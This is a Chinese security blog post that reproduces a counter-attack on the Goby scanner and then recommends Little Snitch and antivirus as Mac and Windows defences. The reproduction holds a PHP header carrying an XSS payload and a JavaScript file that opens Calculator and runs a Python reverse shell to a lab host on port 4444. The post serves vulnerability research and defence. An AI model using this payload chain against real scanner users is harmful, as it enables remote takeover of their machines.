反制 Goby RCE 复现及 Mac 用户防御策略

admin
admin
admin
138985
文章
114
评论
2021年11月23日07:39:56评论194 views字数 2065阅读6分53秒阅读模式

点击蓝字

反制 Goby RCE 复现及 Mac 用户防御策略

关注我们



声明

本文作者:TeamsSix
本文字数:1431

阅读时长:5 分钟

附件/链接:点击查看原文下载

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。

狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。



前言



最近看到网上反制 Goby 的文章,而自己平时 Mac 一直是裸奔的状态,这下整的自己有点慌了,下面就来记录下反制 Goby RCE 的复现以及 Mac 用户的防御策略。


一、

反制 Goby RCE 复现


为了方便,这里直接使用 PhpStudy 了,这里的 PhpStudy 地址为 http://172.16.214.4 ,直接将 Web 服务里的 index.php 改为以下内容。

<?phpheader("X-Powered-By: PHP/<img    src=1    onerror=alert("TeamsSix@WgpSec")>");?>




Goby 在扫描到 http://172.16.214.4 后,点击扫描结果里的 172.16.214.4  就会弹窗了。




注意扫描结果里一定要点击对应的 IP 才行,比如我这里的 IP 是 172.16.214.4,不然是触发不了的




反制 Goby RCE 复现及 Mac 用户防御策略



反制 Goby RCE 复现及 Mac 用户防御策略






复现 RCE 需要再新建一个 js 文件,这里我在 172.16.214.4 的 www 目录下新建了一个名为 mac 的 js 文件,js 内容如下:




    

  • 



(function(){require('child_process').exec('open /System/Applications/Calculator.app');require('child_process').exec('python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.214.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'');})();







执行这段 JS 会在本地打开计算器,并利用 Python 反弹 Shell 到 172.16.214.4 主机的 4444 端口





之后将 index.php 修改如下:


<?phpheader("X-Powered-By: PHP/<img    src=1    onerror=import(unescape('http%3A//172.16.214.4/mac.js'))>");?>




172.16.214.4 上使用 NC 开启 4444 端口监听后,Goby 开启扫描,点击扫描结果里的 172.16.214.4 的详细信息,成功反弹 Shell


反制 Goby RCE 复现及 Mac 用户防御策略
















二、


















Mac 用户防御策略











裸奔的 Mac 真的是一反弹一个准,太没安全感了,于是在师傅们的推荐下,入手了 little snitch,little snitch 官网链接:https://www.obdev.at/products/littlesnitch




声明下这个不是广告啊,只是分享下自己在 Mac 中的防御方法而已




little snitch 可以用来监控 Mac 中所有的联网行为,界面长这个样子,个人觉着还是挺漂亮的。


反制 Goby RCE 复现及 Mac 用户防御策略






实测下来,还是不错的,即使在 Silent 模式下,当监测到有异常连接行为时也会告警,在使用过程中也是能成功拦截到反弹 Shell 请求的。


反制 Goby RCE 复现及 Mac 用户防御策略






不过 little snitch 是付费的,个人觉着买个家庭装是比较划算的,家庭装支持 5 台设备,几个小伙伴拼个单,每个人约合 94 元,另外比较良心的是这个有效期是永久的。


一向习惯了白嫖的我,想了想为了安全还是剁手了,毕竟我可不想那天被反制了,要是被反制了那就 GG 了。


说到这里也许会有人好奇,为啥不说说 Windows 用户的防御策略,于是我自己实际测试了一下,发现在 Windows 下装个杀软就行了,这里以火绒为例,当监测到反弹 Shell 动作时,火绒会直接弹出告警,所以感觉 Windows 就没啥好说的了。


反制 Goby RCE 复现及 Mac 用户防御策略






















后记
























本篇文章没有过多赘述产生原因细节等,因为主要是想分享下自己的防御策略,具体的漏洞细节参考下面的参考文章即可。


不过文中提到的也只是个临时防护方案,存在被绕过的风险,目前 Goby 官方已经发布了最新版本修复了这个漏洞,各位小伙伴赶紧升级到最新版本吧~


参考文章:https://mp.weixin.qq.com/s/tl17-Qz-VXpSlZtZWDgeHg





















作者




























反制 Goby RCE 复现及 Mac 用户防御策略



























TeamsSix
































扫描关注公众号回复加群


和师傅们一起讨论研究~

































































































































WgpSec狼组安全团队


微信号:wgpsec


Twitter:@wgpsec















反制 Goby RCE 复现及 Mac 用户防御策略





















反制 Goby RCE 复现及 Mac 用户防御策略













本文始发于微信公众号(TeamsSix):反制 Goby RCE 复现及 Mac 用户防御策略

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月23日07:39:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   反制 Goby RCE 复现及 Mac 用户防御策略https://cn-sec.com/archives/457592.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息